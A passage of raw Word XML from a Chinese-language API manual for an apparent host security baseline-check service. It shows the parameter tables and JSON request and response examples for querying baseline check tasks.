      <w:tr w:rsidR="00BC669E" w14:paraId="159B34C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444BAEF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2683C964" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D1D9BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E4384B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="_Toc115166249"/>
      <w:bookmarkStart w:id="354" w:name="查询任务"/>
      <w:bookmarkEnd w:id="352"/>
      <w:r>
        <w:t>查询任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="7F472795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C68DDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D5889" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：暂不</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>支持分</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A6646"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224"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="3709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="06F3686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DB2517D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CECFBE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A87CDEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E287372" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F9A59D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E536294" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF9D335" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统，必填：1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B9040EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40E19210" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AD4BC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B3FD9B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E9EEE07" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6817E98A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78672F5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299119FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则id列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BAA501C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721E6AB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13EFF493" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77867102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F4EB08E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD04213" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0383AF25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE2C28E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CA39BF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D811DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1432937F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73512FCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6586AC08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA2700C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B17419" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FBFA0C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A829747" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF27FF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //操作系统，必填 1-linux 2-windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "test",  //任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["1b8094cf2cacf0e42acf"],  //规则id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": [1, 446],  //业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "xxx",  //主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "xxx",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platforms": ["centos-6"],  //操作系统列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38242CA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED0E6BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "591e9185629f9f196bba7a2b",  // 任务规格Id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",      // 最后一次任务ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Test1",  // 任务规格名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>descroption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "xxx", //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""//规则ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>规则２</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>",  // 基线</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>规则名</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2017-03-01", // 检查时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "duration": 0, //持续时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 12043,   // 主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failedHostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0, // 失败主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>successHostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0, // 成功主机数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "progress": 0.2,      // 进度</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passRate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0.5,      // 通过率</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "status": 0,           // 状态 0-Pending，1-Running，2-Done</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30E117"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926"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="07B7543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137EF91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39EE8111" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDA3887" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="726E58CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F273653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E5BCE4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6305D94D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63BA04F6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E51BE04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F35792" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42737E1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73A6EB02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725D36D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0CEDE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="740EB79D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务规格名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46819B34" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659297FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>descroption</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DDFD9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365719B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03D4AC6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="752BF60D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328B3A99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2253CC63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="368E1445" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E705B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D2576F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6570E1AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>规则名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F66A3B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AC68EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
